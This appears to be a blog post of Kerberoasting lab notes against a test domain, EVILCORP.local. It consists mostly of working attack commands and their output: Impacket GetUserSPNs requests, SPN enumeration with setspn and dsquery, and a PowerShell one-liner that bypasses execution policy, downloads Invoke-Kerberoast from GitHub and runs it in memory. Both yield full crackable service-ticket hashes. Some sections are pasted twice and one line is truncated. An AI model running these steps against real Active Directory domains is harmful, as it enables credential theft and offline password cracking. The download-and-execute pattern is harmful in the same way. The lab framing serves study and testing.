Kerberoasting method 1.
From Linux
Locations of Impackets tool in Kali
/opt/CrackMapExec/cme/thirdparty/impacket/examples/GetUserSPNs.py
/usr/share/doc/python-impacket/examples/GetUserSPNs.py
/usr/local/bin/GetUserSPNs.py
---------------------------------------------------------------------------------------
From Windows is a test Lab
Create a service account, which is a user account basically..
Create SPN from a Service account
C:\Users\Administrator>setspn -a "DC-1/svc.EVILCORP.local:60111" "EVILCORP.local\svc"
Registering ServicePrincipalNames for CN=svc svc,DC=EVILCORP,DC=local
DC-1/svc.EVILCORP.local:60111
Updated object
From Linux
Locations of Impackets tool in Kali
/opt/CrackMapExec/cme/thirdparty/impacket/examples/GetUserSPNs.py
/usr/share/doc/python-impacket/examples/GetUserSPNs.py
/usr/local/bin/GetUserSPNs.py
root@kali:/opt# GetUserSPNs.py -request -dc-ip 192.168.1.20 EVILCORP.local/Administrator
Impacket v0.9.19-dev - Copyright 2019 SecureAuth Corporation
Password:
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon
----------------------------- ---- -------- ------------------- ---------
DC-1/svc.EVILCORP.local:60111 svc 2019-08-04 15:46:07 <never>
$krb5tgs$23$*svc$EVILCORP.LOCAL$DC-1/svc.EVILCORP.local~60111*$4b970c634fdc8d45e054444fae9ae498$4552d66e96c7e701bb3697ef5441d47b5c2f62eb40f06fdaf08efc175c84b95818f2b5f0aa855519bdfb73a3136467a68249dee696a2429688301df511da28b9df075980960e7c20c862fca4701e64e2c6b6fff2830378003653d8c92d4c19842e4c73ae87d304a4abed7b51493c27294484bca83f9fc66b8353b84341db124dbd8d43ad624c1f6cf472bf7e11673816df97126a3d17a2a06ad0f2264eb8387a415eccbb66d050129827c71f6b3c72b711ec99097e2ef29cf0180f816289f54fb8fa7df84ca476c9f6e9735d1c2bfd371c87ad2851766ffa007c541ac7969e9e3ff6046f10f29b3ca16291876d2c12f98703943328249f126b1e7496f60f03bc1fa908165772dfb7e24b626c5376c14d301797c3e3999324524fec2f5c85da7776e7171c671db8f0664681b8881521b876dda9882ed53b9af61207d8a7dab1fe299a45017c707bd91024b352a32e77b131d852b0da0fad41df01f1d7d4c7efaca63734ef5b930e7b2bccc45b7297bb66ab583863a0bf222399fe2388e1102974040138b5bc8a88d50cc2d9bbc58a857b17c8241e8a4e8088c912531a8c9f04d0330fd964510515189618a8aa00bcf321703fadc8133f53d890d62959833a35239e07bd7d634820d56b693ceeede9c43ffa0b62ef47760aa2b9afe29b7735cfdfbe7ce3efac02f77c2da260968b8c01530d0417b83c16f4199d327c9676abfa1af6ca34f75edd655697ade919e6d129b72bef6bb2662dc47761865d468a7c79ac90ef666965ef2e48bc76741ca8b7af48748f5b9325e4aa4c1ee1291cb937b573a931620376ad26f21caf74903c7c3bed43e622728034d089dcaed0e8ea873600f5d4078f2e7da4523687a9641165b2f1ae3dc8fe99829d08b0f795a75c21fd1ab84a785744a750f5b8d87f6212087b33882d8b491da072f6a2c90deed643358182c7c38a1a9347845c9701970b67ed4c338014c259d196fac003f3d891fbe591e4c161f33249cbae16f0a49041324a5b5ea1fbc75d5ffbb1ccbdda97a5a253b5bfc84b174bf126c2b483bd32877ac0fcaaa3ecb2f183c7812ea3ecac716939609bb941f7d3f81382dd68faae0536c42cf4f0f2494163f3cd079f8dde2ff4f3833a72fcf8702df8159c76349a56d89fec1ca87e99b82cbacee9c446d029333bfe540d81c6fb37fbe50b71698f1d71e93f4df1f7c71139483bd41280016014b1fb57acc01432d4ed295920b3984abe1b6670e0fe63c077eef6da5cef6f58025a9a2236e44b667eaf36bd64191e14ba65721f62abe1f08034f1f93a3b4151cb715ee5d4bcfd72f4499e3a3eda86f5f170c325368c93b242eb997ed16740897e7ee90e2163b0ae8efb64f12ec80ba3a0cc263eb279b5b885df7643ed898e64cff508181f7d8a24a5ab842229958d6388f209264aaad3e0907a98a5ae2735ef0902a4e5701094
-------------------------------------------------------------------------------------
Scanning for SPN's in Windows
Scanning for SPN's in Windows
dsquery * "ou=domain controllers,dc=yourdomain,dc=com" -filter "(&(objectcategory=computer)
(servicePrincipalName=*))" -attr distinguishedName servicePrincipalName > spns.txt---------------------------------------------------------------------------------------
From Windows is a test Lab
Create a service account, which is a user account basically..
Create SPN from a Service account
C:\Users\Administrator>setspn -a "DC-1/svc.EVILCORP.local:60111" "EVILCORP.local\svc"
Registering ServicePrincipalNames for CN=svc svc,DC=EVILCORP,DC=local
DC-1/svc.EVILCORP.local:60111
Updated object
C:\Users\Administrator>setspn -T EVILCORP.LOCAL -Q */*
Checking domain DC=EVILCORP,DC=local
CN=DC-1,OU=Domain Controllers,DC=EVILCORP,DC=local
Dfsr-12F9A27C-BF97-4787-9364-D31B6C55EB04/DC-1.EVILCORP.local
HOST/DC-1/EVILCORP
ldap/DC-1/EVILCORP
ldap/DC-1.EVILCORP.local/ForestDnsZones.EVILCORP.local
ldap/DC-1.EVILCORP.local/DomainDnsZones.EVILCORP.local
NtFrs-88f5d2bd-b646-11d2-a6d3-00c04fc9b232/DC-1.EVILCORP.local
DNS/DC-1.EVILCORP.local
GC/DC-1.EVILCORP.local/EVILCORP.local
RestrictedKrbHost/DC-1.EVILCORP.local
RestrictedKrbHost/DC-1
HOST/DC-1.EVILCORP.local/EVILCORP
HOST/DC-1
HOST/DC-1.EVILCORP.local
HOST/DC-1.EVILCORP.local/EVILCORP.local
ldap/DC-1.EVILCORP.local/EVILCORP
ldap/DC-1
ldap/DC-1.EVILCORP.local
ldap/DC-1.EVILCORP.local/EVILCORP.local
E3514235-4B06-11D1-AB04-00C04FC2DCD2/c6ba183e-8815-45c3-bf1e-a97f467e73bb/EVILCORP.local
ldap/c6ba183e-8815-45c3-bf1e-a97f467e73bb._msdcs.EVILCORP.local
CN=krbtgt,CN=Users,DC=EVILCORP,DC=local
kadmin/changepw
CN=LAB-1-WIN10,CN=Computers,DC=EVILCORP,DC=local
RestrictedKrbHost/LAB-1-WIN10
HOST/LAB-1-WIN10
RestrictedKrbHost/LAB-1-WIN10.EVILCORP.local
HOST/LAB-1-WIN10.EVILCORP.local
CN=LAB-2-WIN10,CN=Computers,DC=EVILCORP,DC=local
RestrictedKrbHost/LAB-2-WIN10
HOST/LAB-2-WIN10
RestrictedKrbHost/LAB-2-WIN10.EVILCORP.local
HOST/LAB-2-WIN10.EVILCORP.local
CN=svc svc,DC=EVILCORP,DC=local
DC-1/svc.EVILCORP.local:60111
C:\Users\Administrator>powershell.exe -NoP -NonI -Exec Bypass IEX (New-Object Net.WebClient).DownloadStri
ng('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-K
erberoast.ps1');Invoke-Kerberoast -erroraction silentlycontinue -OutputFormat Hashcat
TicketByteHexStream :
Hash : $krb5tgs$23$*svc$EVILCORP.local$DC-1/svc.EVILCORP.local:60111*$F128AC53A6FBE47300
B1D10E2AE1D6B2$586CC169E01B98E3BC08D39E83AFAA7721B7105BA80EF064C4ED9525CC0C7E21D1
F8C09B5FCC9E3063B6328B79BBEE7FB170D939D27972339CF898EBE84BB4644F44F178C8302403EDE
4F5E2284A575235CBC2600AD8326BA271E2C2720C6A1CF0B3089C60AAD1BD5A1F3FAF048762EFDA63
EBEA1D5A0E31E0C3A39F608B8885CEB392A74E4650ED276455CB758DC6D572D371C14D7D1142487BE
53C41A22D40F5C7F29B22A2081F85612881DC0A1B564AED150001DDC21E43AA626A9A4315628B7A80
A36C188CBE24440A6BF9FD42EB62A2A802BDD38A2467EF207FCA8C44525064E170AF07F4F1653B57A
4E37DE50EF718A03689B2DD85723C1492FD3BF930C5806C6F4DFE25074CE7B7283A21422FF6EAD136
FD6E7E713E283B4B27ED7E6A482213516C9C38C475159FDE1246F016571A205DCC90E33A194F78DA6
D1995AB7F2A62041DCC3144F780C6FB42C6D0BC29472669763FD30BBBD67B1F4E0CB048144B35058F
DCC1C359BB9A2D98C247502347252EC7A638EC91405DAA527C3FAEFDF1E8C9B7C3867B1C40CCB673B
88B7D77613A6E8DD4E8204B813AC38B0AA36437338CB3DC26604ACF6F59AE187F9648A694D26A3E7F
ED33825525EDA0D407A49F035EF41483C735860A13FB7D9D7076CB88EBCEFF67077A0F01F32D7CE3A
E67B4DF889B9079B33ACEC857B27D5C078F1887AF4BDAF11370B20500F012B9FDA30FB741F5D87D86
62D9B099F63BBBEA66BD5710DAD339CBA303EEF0E4C660E65A062AE86E2F00E8369210B9582DAAF1B
BB90A7C176500246400ECFFF8C350AAC5ED8E1FAC6F6AC465F43831E6F26DE976A503FD4CED12007B
B89C74ADFFAB71A8CF619E716AB50F6DAF7194B50ED0C2BA8EA4B564FFD79817C32CE9821A261B2E5
3BC8A433C4806D0D26F4419106F0E419A5220F1540941B0660E964D42B3456B0885946977CEB92558
EA33AA470E413E02DA7094212B63BDED1EE145E61DB66ABAD7E8EFE4D8CE8BF37839F4CE0D412E20A
A0A6036F105437539FA347E4F785FD4ED0CE4DD131220A0583B99735495885D7F1A38DF49CC310C83
19247A51302369DBEAEA0F420DE07BF2381F84BCBE652885BB6D12E69063F1D3AD393132084840378
4C476B20C69087CAEBC0E9D864C1C05193D53EBB9551BFD467D9B35447464E472EE3CE7A0754C9FAE
A13A7BE373BB978CD39FE99182D1D24CDE895FFAB58C8F64CFD20FD4DF8791F962EF5A3FE3C28F927
595C9338785FFC0B70A36D81758EA25953AF530039688C085D0CA4337E8068CC0E573A45565C95A4A
3A69173AB5770ABEB2EED009181D41F1C226F81ABAD82852CEC763C0F4607545DFF042E639EA20872
5C6CAF71BC06E937B72DA6941C75126A43A5AEB8F89166A715D243C24A4CC52A255338E070F770B22
6B903711B2AE3A1DC91C98A10FF0EDFDE8536B8464AF986C617C520CC7FD3E7792A3951A52D8CF35E
94E29589639751A52BF627F6BFA190AA20711B1C533E7A83F2757A677CB86E15543E36DE4293B2883
B6706573465C316C45F352B157AECB9F60EA58EFBBBDEEF9634B007F1B5E224D9CB06236E5185787B
8CE83BA64B7C8CA
SamAccountName : svc
DistinguishedName : CN=svc svc,DC=EVILCORP,DC=local
ServicePrincipalName : DC-1/svc.EVILCORP.local:60111
erberoast.ps1');Invoke-Kerberoast -erroraction silentlycontinue -OutputFormat Hashcat
TicketByteHexStream :
Hash : $krb5tgs$23$*svc$EVILCORP.local$DC-1/svc.EVILCORP.local:60111*$F128AC53A6FBE47300
B1D10E2AE1D6B2$586CC169E01B98E3BC08D39E83AFAA7721B7105BA80EF064C4ED9525CC0C7E21D1
F8C09B5FCC9E3063B6328B79BBEE7FB170D939D27972339CF898EBE84BB4644F44F178C8302403EDE
4F5E2284A575235CBC2600AD8326BA271E2C2720C6A1CF0B3089C60AAD1BD5A1F3FAF048762EFDA63
EBEA1D5A0E31E0C3A39F608B8885CEB392A74E4650ED276455CB758DC6D572D371C14D7D1142487BE
53C41A22D40F5C7F29B22A2081F85612881DC0A1B564AED150001DDC21E43AA626A9A4315628B7A80
A36C188CBE24440A6BF9FD42EB62A2A802BDD38A2467EF207FCA8C44525064E170AF07F4F1653B57A
4E37DE50EF718A03689B2DD85723C1492FD3BF930C5806C6F4DFE25074CE7B7283A21422FF6EAD136
FD6E7E713E283B4B27ED7E6A482213516C9C38C475159FDE1246F016571A205DCC90E33A194F78DA6
D1995AB7F2A62041DCC3144F780C6FB42C6D0BC29472669763FD30BBBD67B1F4E0CB048144B35058F
DCC1C359BB9A2D98C247502347252EC7A638EC91405DAA527C3FAEFDF1E8C9B7C3867B1C40CCB673B
88B7D77613A6E8DD4E8204B813AC38B0AA36437338CB3DC26604ACF6F59AE187F9648A694D26A3E7F
ED33825525EDA0D407A49F035EF41483C735860A13FB7D9D7076CB88EBCEFF67077A0F01F32D7CE3A
E67B4DF889B9079B33ACEC857B27D5C078F1887AF4BDAF11370B20500F012B9FDA30FB741F5D87D86
62D9B099F63BBBEA66BD5710DAD339CBA303EEF0E4C660E65A062AE86E2F00E8369210B9582DAAF1B
BB90A7C176500246400ECFFF8C350AAC5ED8E1FAC6F6AC465F43831E6F26DE976A503FD4CED12007B
B89C74ADFFAB71A8CF619E716AB50F6DAF7194B50ED0C2BA8EA4B564FFD79817C32CE9821A261B2E5
3BC8A433C4806D0D26F4419106F0E419A5220F1540941B0660E964D42B3456B0885946977CEB92558
EA33AA470E413E02DA7094212B63BDED1EE145E61DB66ABAD7E8EFE4D8CE8BF37839F4CE0D412E20A
A0A6036F105437539FA347E4F785FD4ED0CE4DD131220A0583B99735495885D7F1A38DF49CC310C83
19247A51302369DBEAEA0F420DE07BF2381F84BCBE652885BB6D12E69063F1D3AD393132084840378
4C476B20C69087CAEBC0E9D864C1C05193D53EBB9551BFD467D9B35447464E472EE3CE7A0754C9FAE
A13A7BE373BB978CD39FE99182D1D24CDE895FFAB58C8F64CFD20FD4DF8791F962EF5A3FE3C28F927
595C9338785FFC0B70A36D81758EA25953AF530039688C085D0CA4337E8068CC0E573A45565C95A4A
3A69173AB5770ABEB2EED009181D41F1C226F81ABAD82852CEC763C0F4607545DFF042E639EA20872
5C6CAF71BC06E937B72DA6941C75126A43A5AEB8F89166A715D243C24A4CC52A255338E070F770B22
6B903711B2AE3A1DC91C98A10FF0EDFDE8536B8464AF986C617C520CC7FD3E7792A3951A52D8CF35E
94E29589639751A52BF627F6BFA190AA20711B1C533E7A83F2757A677CB86E15543E36DE4293B2883
B6706573465C316C45F352B157AECB9F60EA58EFBBBDEEF9634B007F1B5E224D9CB06236E5185787B
8CE83BA64B7C8CA
SamAccountName : svc
DistinguishedName : CN=svc svc,DC=EVILCORP,DC=local
ServicePrincipalName : DC-1/svc.EVILCORP.local:60111
No comments:
Post a Comment